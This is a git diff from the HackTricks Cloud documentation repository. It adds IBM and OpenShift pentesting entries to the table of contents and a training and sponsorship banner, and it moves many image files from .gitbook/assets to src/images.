+ - [IBM - Hyper Protect Virtual Server](pentesting-cloud/ibm-cloud-pentesting/ibm-hyper-protect-virtual-server.md)
+ - [IBM - Basic Information](pentesting-cloud/ibm-cloud-pentesting/ibm-basic-information.md)
+- [OpenShift Pentesting](pentesting-cloud/openshift-pentesting/README.md)
+ - [OpenShift - Basic information](pentesting-cloud/openshift-pentesting/openshift-basic-information.md)
+ - [Openshift - SCC](pentesting-cloud/openshift-pentesting/openshift-scc.md)
+ - [OpenShift - Jenkins](pentesting-cloud/openshift-pentesting/openshift-jenkins/README.md)
+ - [OpenShift - Jenkins Build Pod 
Override](pentesting-cloud/openshift-pentesting/openshift-jenkins/openshift-jenkins-build-overrides.md)
+ - [OpenShift - Privilege Escalation](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/README.md)
+ - [OpenShift - Missing Service Account](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-missing-service-account.md)
+ - [OpenShift - Tekton](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-tekton.md)
+ - [OpenShift - SCC bypass](pentesting-cloud/openshift-pentesting/openshift-privilege-escalation/openshift-scc-bypass.md)
+
+# 🛫 Pentesting Network Services
+
+- [HackTricks Pentesting Network$$external:https://book.hacktricks.xyz/generic-methodologies-and-resources/pentesting-network$$]()
+- [HackTricks Pentesting Services$$external:https://book.hacktricks.xyz/network-services-pentesting/pentesting-ssh$$]()
diff --git a/src/banners/hacktricks-training.md b/src/banners/hacktricks-training.md
new file mode 100644
index 000000000..b03deaf4a
--- /dev/null
+++ b/src/banners/hacktricks-training.md
@@ -0,0 +1,13 @@
+> [!TIP]
+> Learn & practice AWS Hacking:[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)\
+> Learn & practice GCP Hacking: [**HackTricks Training GCP Red Team Expert (GRTE)**](https://training.hacktricks.xyz/courses/grte)
+>
+>

+>
+> Support HackTricks
+>
+> - Check the [**subscription plans**](https://github.com/sponsors/carlospolop)!
+> - **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
+> - **Share hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
+>
+>

diff --git a/.gitbook/assets/05-constraints.png b/src/images/05-constraints.png
similarity index 100%
rename from .gitbook/assets/05-constraints.png
rename to src/images/05-constraints.png
diff --git a/.gitbook/assets/2023-03-06 17_02_47-.png b/src/images/2023-03-06 17_02_47-.png
similarity index 100%
rename from .gitbook/assets/2023-03-06 17_02_47-.png
rename to src/images/2023-03-06 17_02_47-.png
diff --git a/.gitbook/assets/2023-03-06 17_11_28-Window.png b/src/images/2023-03-06 17_11_28-Window.png
similarity index 100%
rename from .gitbook/assets/2023-03-06 17_11_28-Window.png
rename to src/images/2023-03-06 17_11_28-Window.png
diff --git a/.gitbook/assets/2023-03-06 17_11_43-Window.png b/src/images/2023-03-06 17_11_43-Window.png
similarity index 100%
rename from .gitbook/assets/2023-03-06 17_11_43-Window.png
rename to src/images/2023-03-06 17_11_43-Window.png
diff --git a/.gitbook/assets/2023-03-06 17_28_26-Window.png b/src/images/2023-03-06 17_28_26-Window.png
similarity index 100%
rename from .gitbook/assets/2023-03-06 17_28_26-Window.png
rename to src/images/2023-03-06 17_28_26-Window.png
diff --git a/.gitbook/assets/2023-03-06 17_28_50-Window.png b/src/images/2023-03-06 17_28_50-Window.png
similarity index 100%
rename from .gitbook/assets/2023-03-06 17_28_50-Window.png
rename to src/images/2023-03-06 17_28_50-Window.png
diff --git a/.gitbook/assets/CLOUD-logo-letters.svg b/src/images/CLOUD-logo-letters.svg
similarity index 100%
rename from .gitbook/assets/CLOUD-logo-letters.svg
rename to src/images/CLOUD-logo-letters.svg
diff --git a/src/images/CLOUD-web-logo.png b/src/images/CLOUD-web-logo.png
new file mode 100644
index 000000000..1671d0bf8
Binary files /dev/null and b/src/images/CLOUD-web-logo.png differ
diff --git a/src/images/HT-TRAINING-web-logo.png b/src/images/HT-TRAINING-web-logo.png
new file mode 100644
index 000000000..ca084e352
Binary files /dev/null and b/src/images/HT-TRAINING-web-logo.png differ
diff --git a/.gitbook/assets/Imagen13.png b/src/images/Imagen13.png
similarity index 100%
rename from .gitbook/assets/Imagen13.png
rename to src/images/Imagen13.png
diff --git a/.gitbook/assets/Imagen14.png b/src/images/Imagen14.png
similarity index 100%
rename from .gitbook/assets/Imagen14.png
rename to src/images/Imagen14.png
diff --git a/.gitbook/assets/Kyverno.png b/src/images/Kyverno.png
similarity index 100%
rename from .gitbook/assets/Kyverno.png
rename to src/images/Kyverno.png
diff --git a/.gitbook/assets/Managing SCCs in OpenShift-1.png b/src/images/Managing SCCs in OpenShift-1.png
similarity index 100%
rename from .gitbook/assets/Managing SCCs in OpenShift-1.png
rename to src/images/Managing SCCs in OpenShift-1.png
diff --git a/.gitbook/assets/Openshift-RunLevel4.png b/src/images/Openshift-RunLevel4.png
similarity index 100%
rename from .gitbook/assets/Openshift-RunLevel4.png
rename to src/images/Openshift-RunLevel4.png
diff --git a/src/images/arte.png b/src/images/arte.png
new file mode 100644
index 000000000..57f392dbe
Binary files /dev/null and b/src/images/arte.png differ
diff --git a/.gitbook/assets/cloud gif.gif b/src/images/cloud gif.gif
similarity index 100%
rename from .gitbook/assets/cloud gif.gif
rename to src/images/cloud gif.gif
diff --git a/.gitbook/assets/cloud.gif b/src/images/cloud.gif
similarity index 100%
rename from .gitbook/assets/cloud.gif
rename to src/images/cloud.gif
diff --git a/src/images/grte.png b/src/images/grte.png
new file mode 100644
index 000000000..b4f01d59c
Binary files /dev/null and b/src/images/grte.png differ
diff --git a/.gitbook/assets/hc (1) (1).png b/src/images/hc (1) (1).png
similarity index 100%
rename from .gitbook/assets/hc (1) (1).png
rename to src/images/hc (1) (1).png
diff --git a/.gitbook/assets/hc (1).png b/src/images/hc (1).png
similarity index 100%
rename from .gitbook/assets/hc (1).png
rename to src/images/hc (1).png
diff --git a/.gitbook/assets/hc (2) (1).png b/src/images/hc (2) (1).png
similarity index 100%
rename from .gitbook/assets/hc (2) (1).png
rename to src/images/hc (2) (1).png
diff --git a/.gitbook/assets/hc (2).png b/src/images/hc (2).png
similarity index 100%
rename from .gitbook/assets/hc (2).png
rename to src/images/hc (2).png
diff --git a/.gitbook/assets/hc (3).png b/src/images/hc (3).png
similarity index 100%
rename from .gitbook/assets/hc (3).png
rename to src/images/hc (3).png
diff --git a/.gitbook/assets/hc (4).png b/src/images/hc (4).png
similarity index 100%
rename from .gitbook/assets/hc (4).png
rename to src/images/hc (4).png
diff --git a/.gitbook/assets/hc.jpeg b/src/images/hc.jpeg
similarity index 100%
rename from .gitbook/assets/hc.jpeg
rename to src/images/hc.jpeg
diff --git a/.gitbook/assets/hc.png b/src/images/hc.png
similarity index 100%
rename from .gitbook/assets/hc.png
rename to src/images/hc.png
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
similarity index 100%
rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png 
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1) (1).png 
diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (1).png b/src/images/image (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (1).png rename to src/images/image (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (2).png b/src/images/image (1) (1) (1) (2).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (2).png rename to src/images/image (1) (1) (1) (2).png 
diff --git a/.gitbook/assets/image (1) (1) (1) (3) (1) (1).png b/src/images/image (1) (1) (1) (3) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (3) (1) (1).png rename to src/images/image (1) (1) (1) (3) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (3) (1).png b/src/images/image (1) (1) (1) (3) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (3) (1).png rename to src/images/image (1) (1) (1) (3) (1).png diff --git a/.gitbook/assets/image (1) (1) (1) (3).png b/src/images/image (1) (1) (1) (3).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1) (3).png rename to src/images/image (1) (1) (1) (3).png diff --git a/.gitbook/assets/image (1) (1) (1).png b/src/images/image (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (1).png rename to src/images/image (1) (1) (1).png diff --git a/.gitbook/assets/image (1) (1) (2).png b/src/images/image (1) (1) (2).png similarity index 100% rename from .gitbook/assets/image (1) (1) (2).png rename to src/images/image (1) (1) (2).png diff --git a/.gitbook/assets/image (1) (1) (3) (1).png b/src/images/image (1) (1) (3) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1) (3) (1).png rename to src/images/image (1) (1) (3) (1).png diff --git a/.gitbook/assets/image (1) (1) (3).png b/src/images/image (1) (1) (3).png similarity index 100% rename from .gitbook/assets/image (1) (1) (3).png rename to src/images/image (1) (1) (3).png diff --git a/.gitbook/assets/image (1) (1) (4).png b/src/images/image (1) (1) (4).png similarity index 100% rename from .gitbook/assets/image (1) (1) (4).png rename to src/images/image (1) (1) (4).png diff --git a/.gitbook/assets/image (1) (1) (5).png b/src/images/image (1) (1) (5).png similarity index 100% rename from .gitbook/assets/image (1) (1) (5).png rename to src/images/image (1) (1) (5).png 
diff --git a/.gitbook/assets/image (1) (1) (6).png b/src/images/image (1) (1) (6).png similarity index 100% rename from .gitbook/assets/image (1) (1) (6).png rename to src/images/image (1) (1) (6).png diff --git a/.gitbook/assets/image (1) (1).png b/src/images/image (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (1).png rename to src/images/image (1) (1).png diff --git a/.gitbook/assets/image (1) (2) (1) (1).png b/src/images/image (1) (2) (1) (1).png similarity index 100% rename from .gitbook/assets/image (1) (2) (1) (1).png rename to src/images/image (1) (2) (1) (1).png diff --git a/.gitbook/assets/image (1) (2) (1).png b/src/images/image (1) (2) (1).png similarity index 100% rename from .gitbook/assets/image (1) (2) (1).png rename to src/images/image (1) (2) (1).png diff --git a/.gitbook/assets/image (1) (2) (2).png b/src/images/image (1) (2) (2).png similarity index 100% rename from .gitbook/assets/image (1) (2) (2).png rename to src/images/image (1) (2) (2).png diff --git a/.gitbook/assets/image (1) (2).png b/src/images/image (1) (2).png similarity index 100% rename from .gitbook/assets/image (1) (2).png rename to src/images/image (1) (2).png diff --git a/.gitbook/assets/image (1) (3) (1).png b/src/images/image (1) (3) (1).png similarity index 100% rename from .gitbook/assets/image (1) (3) (1).png rename to src/images/image (1) (3) (1).png diff --git a/.gitbook/assets/image (1) (3).png b/src/images/image (1) (3).png similarity index 100% rename from .gitbook/assets/image (1) (3).png rename to src/images/image (1) (3).png diff --git a/.gitbook/assets/image (1) (4).png b/src/images/image (1) (4).png similarity index 100% rename from .gitbook/assets/image (1) (4).png rename to src/images/image (1) (4).png diff --git a/.gitbook/assets/image (1) (5).png b/src/images/image (1) (5).png similarity index 100% rename from .gitbook/assets/image (1) (5).png rename to src/images/image (1) (5).png 
diff --git a/.gitbook/assets/image (1) (6).png b/src/images/image (1) (6).png similarity index 100% rename from .gitbook/assets/image (1) (6).png rename to src/images/image (1) (6).png diff --git a/.gitbook/assets/image (1) (7).png b/src/images/image (1) (7).png similarity index 100% rename from .gitbook/assets/image (1) (7).png rename to src/images/image (1) (7).png diff --git a/.gitbook/assets/image (1) (8).png b/src/images/image (1) (8).png similarity index 100% rename from .gitbook/assets/image (1) (8).png rename to src/images/image (1) (8).png diff --git a/.gitbook/assets/image (1) (9).png b/src/images/image (1) (9).png similarity index 100% rename from .gitbook/assets/image (1) (9).png rename to src/images/image (1) (9).png diff --git a/.gitbook/assets/image (1).png b/src/images/image (1).png similarity index 100% rename from .gitbook/assets/image (1).png rename to src/images/image (1).png diff --git a/.gitbook/assets/image (10) (1) (1) (1) (1).png b/src/images/image (10) (1) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (10) (1) (1) (1) (1).png rename to src/images/image (10) (1) (1) (1) (1).png diff --git a/.gitbook/assets/image (10) (1) (1) (1).png b/src/images/image (10) (1) (1) (1).png similarity index 100% rename from .gitbook/assets/image (10) (1) (1) (1).png rename to src/images/image (10) (1) (1) (1).png diff --git a/.gitbook/assets/image (10) (1) (1).png b/src/images/image (10) (1) (1).png similarity index 100% rename from .gitbook/assets/image (10) (1) (1).png rename to src/images/image (10) (1) (1).png diff --git a/.gitbook/assets/image (10) (1).png b/src/images/image (10) (1).png similarity index 100% rename from .gitbook/assets/image (10) (1).png rename to src/images/image (10) (1).png diff --git a/.gitbook/assets/image (10) (2).png b/src/images/image (10) (2).png similarity index 100% rename from .gitbook/assets/image (10) (2).png rename to src/images/image (10) (2).png 
diff --git a/.gitbook/assets/image (10) (3).png b/src/images/image (10) (3).png similarity index 100% rename from .gitbook/assets/image (10) (3).png rename to src/images/image (10) (3).png diff --git a/.gitbook/assets/image (10) (4).png b/src/images/image (10) (4).png similarity index 100% rename from .gitbook/assets/image (10) (4).png rename to src/images/image (10) (4).png diff --git a/.gitbook/assets/image (10).png b/src/images/image (10).png similarity index 100% rename from .gitbook/assets/image (10).png rename to src/images/image (10).png diff --git a/.gitbook/assets/image (100).png b/src/images/image (100).png similarity index 100% rename from .gitbook/assets/image (100).png rename to src/images/image (100).png diff --git a/.gitbook/assets/image (101).png b/src/images/image (101).png similarity index 100% rename from .gitbook/assets/image (101).png rename to src/images/image (101).png diff --git a/.gitbook/assets/image (102).png b/src/images/image (102).png similarity index 100% rename from .gitbook/assets/image (102).png rename to src/images/image (102).png diff --git a/.gitbook/assets/image (103).png b/src/images/image (103).png similarity index 100% rename from .gitbook/assets/image (103).png rename to src/images/image (103).png diff --git a/.gitbook/assets/image (104).png b/src/images/image (104).png similarity index 100% rename from .gitbook/assets/image (104).png rename to src/images/image (104).png diff --git a/.gitbook/assets/image (105).png b/src/images/image (105).png similarity index 100% rename from .gitbook/assets/image (105).png rename to src/images/image (105).png diff --git a/.gitbook/assets/image (106).png b/src/images/image (106).png similarity index 100% rename from .gitbook/assets/image (106).png rename to src/images/image (106).png diff --git a/.gitbook/assets/image (107).png b/src/images/image (107).png similarity index 100% rename from .gitbook/assets/image (107).png rename to src/images/image (107).png 
diff --git a/.gitbook/assets/image (108).png b/src/images/image (108).png similarity index 100% rename from .gitbook/assets/image (108).png rename to src/images/image (108).png diff --git a/.gitbook/assets/image (109).png b/src/images/image (109).png similarity index 100% rename from .gitbook/assets/image (109).png rename to src/images/image (109).png diff --git a/.gitbook/assets/image (11) (1) (1).png b/src/images/image (11) (1) (1).png similarity index 100% rename from .gitbook/assets/image (11) (1) (1).png rename to src/images/image (11) (1) (1).png diff --git a/.gitbook/assets/image (11) (1) (2) (1).png b/src/images/image (11) (1) (2) (1).png similarity index 100% rename from .gitbook/assets/image (11) (1) (2) (1).png rename to src/images/image (11) (1) (2) (1).png diff --git a/.gitbook/assets/image (11) (1) (2).png b/src/images/image (11) (1) (2).png similarity index 100% rename from .gitbook/assets/image (11) (1) (2).png rename to src/images/image (11) (1) (2).png diff --git a/.gitbook/assets/image (11) (1).png b/src/images/image (11) (1).png similarity index 100% rename from .gitbook/assets/image (11) (1).png rename to src/images/image (11) (1).png diff --git a/.gitbook/assets/image (11) (2).png b/src/images/image (11) (2).png similarity index 100% rename from .gitbook/assets/image (11) (2).png rename to src/images/image (11) (2).png diff --git a/.gitbook/assets/image (11) (3).png b/src/images/image (11) (3).png similarity index 100% rename from .gitbook/assets/image (11) (3).png rename to src/images/image (11) (3).png diff --git a/.gitbook/assets/image (11) (4).png b/src/images/image (11) (4).png similarity index 100% rename from .gitbook/assets/image (11) (4).png rename to src/images/image (11) (4).png diff --git a/.gitbook/assets/image (11).png b/src/images/image (11).png similarity index 100% rename from .gitbook/assets/image (11).png rename to src/images/image (11).png 
diff --git a/.gitbook/assets/image (110).png b/src/images/image (110).png similarity index 100% rename from .gitbook/assets/image (110).png rename to src/images/image (110).png diff --git a/.gitbook/assets/image (111).png b/src/images/image (111).png similarity index 100% rename from .gitbook/assets/image (111).png rename to src/images/image (111).png diff --git a/.gitbook/assets/image (112).png b/src/images/image (112).png similarity index 100% rename from .gitbook/assets/image (112).png rename to src/images/image (112).png diff --git a/.gitbook/assets/image (113).png b/src/images/image (113).png similarity index 100% rename from .gitbook/assets/image (113).png rename to src/images/image (113).png diff --git a/.gitbook/assets/image (114).png b/src/images/image (114).png similarity index 100% rename from .gitbook/assets/image (114).png rename to src/images/image (114).png diff --git a/.gitbook/assets/image (115).png b/src/images/image (115).png similarity index 100% rename from .gitbook/assets/image (115).png rename to src/images/image (115).png diff --git a/.gitbook/assets/image (116).png b/src/images/image (116).png similarity index 100% rename from .gitbook/assets/image (116).png rename to src/images/image (116).png diff --git a/.gitbook/assets/image (117).png b/src/images/image (117).png similarity index 100% rename from .gitbook/assets/image (117).png rename to src/images/image (117).png diff --git a/.gitbook/assets/image (118).png b/src/images/image (118).png similarity index 100% rename from .gitbook/assets/image (118).png rename to src/images/image (118).png diff --git a/.gitbook/assets/image (119).png b/src/images/image (119).png similarity index 100% rename from .gitbook/assets/image (119).png rename to src/images/image (119).png diff --git a/.gitbook/assets/image (12) (1).png b/src/images/image (12) (1).png similarity index 100% rename from .gitbook/assets/image (12) (1).png rename to src/images/image (12) (1).png 
diff --git a/.gitbook/assets/image (12) (2).png b/src/images/image (12) (2).png similarity index 100% rename from .gitbook/assets/image (12) (2).png rename to src/images/image (12) (2).png diff --git a/.gitbook/assets/image (12).png b/src/images/image (12).png similarity index 100% rename from .gitbook/assets/image (12).png rename to src/images/image (12).png diff --git a/.gitbook/assets/image (120).png b/src/images/image (120).png similarity index 100% rename from .gitbook/assets/image (120).png rename to src/images/image (120).png diff --git a/.gitbook/assets/image (121).png b/src/images/image (121).png similarity index 100% rename from .gitbook/assets/image (121).png rename to src/images/image (121).png diff --git a/.gitbook/assets/image (122).png b/src/images/image (122).png similarity index 100% rename from .gitbook/assets/image (122).png rename to src/images/image (122).png diff --git a/.gitbook/assets/image (123).png b/src/images/image (123).png similarity index 100% rename from .gitbook/assets/image (123).png rename to src/images/image (123).png diff --git a/.gitbook/assets/image (124).png b/src/images/image (124).png similarity index 100% rename from .gitbook/assets/image (124).png rename to src/images/image (124).png diff --git a/.gitbook/assets/image (125).png b/src/images/image (125).png similarity index 100% rename from .gitbook/assets/image (125).png rename to src/images/image (125).png diff --git a/.gitbook/assets/image (126).png b/src/images/image (126).png similarity index 100% rename from .gitbook/assets/image (126).png rename to src/images/image (126).png diff --git a/.gitbook/assets/image (127).png b/src/images/image (127).png similarity index 100% rename from .gitbook/assets/image (127).png rename to src/images/image (127).png diff --git a/.gitbook/assets/image (128).png b/src/images/image (128).png similarity index 100% rename from .gitbook/assets/image (128).png rename to src/images/image (128).png 
diff --git a/.gitbook/assets/image (129).png b/src/images/image (129).png similarity index 100% rename from .gitbook/assets/image (129).png rename to src/images/image (129).png diff --git a/.gitbook/assets/image (13) (1) (1).png b/src/images/image (13) (1) (1).png similarity index 100% rename from .gitbook/assets/image (13) (1) (1).png rename to src/images/image (13) (1) (1).png diff --git a/.gitbook/assets/image (13) (1).png b/src/images/image (13) (1).png similarity index 100% rename from .gitbook/assets/image (13) (1).png rename to src/images/image (13) (1).png diff --git a/.gitbook/assets/image (13).png b/src/images/image (13).png similarity index 100% rename from .gitbook/assets/image (13).png rename to src/images/image (13).png diff --git a/.gitbook/assets/image (130).png b/src/images/image (130).png similarity index 100% rename from .gitbook/assets/image (130).png rename to src/images/image (130).png diff --git a/.gitbook/assets/image (131).png b/src/images/image (131).png similarity index 100% rename from .gitbook/assets/image (131).png rename to src/images/image (131).png diff --git a/.gitbook/assets/image (132).png b/src/images/image (132).png similarity index 100% rename from .gitbook/assets/image (132).png rename to src/images/image (132).png diff --git a/.gitbook/assets/image (133).png b/src/images/image (133).png similarity index 100% rename from .gitbook/assets/image (133).png rename to src/images/image (133).png diff --git a/.gitbook/assets/image (134).png b/src/images/image (134).png similarity index 100% rename from .gitbook/assets/image (134).png rename to src/images/image (134).png diff --git a/.gitbook/assets/image (135).png b/src/images/image (135).png similarity index 100% rename from .gitbook/assets/image (135).png rename to src/images/image (135).png diff --git a/.gitbook/assets/image (136).png b/src/images/image (136).png similarity index 100% rename from .gitbook/assets/image (136).png rename to src/images/image (136).png 
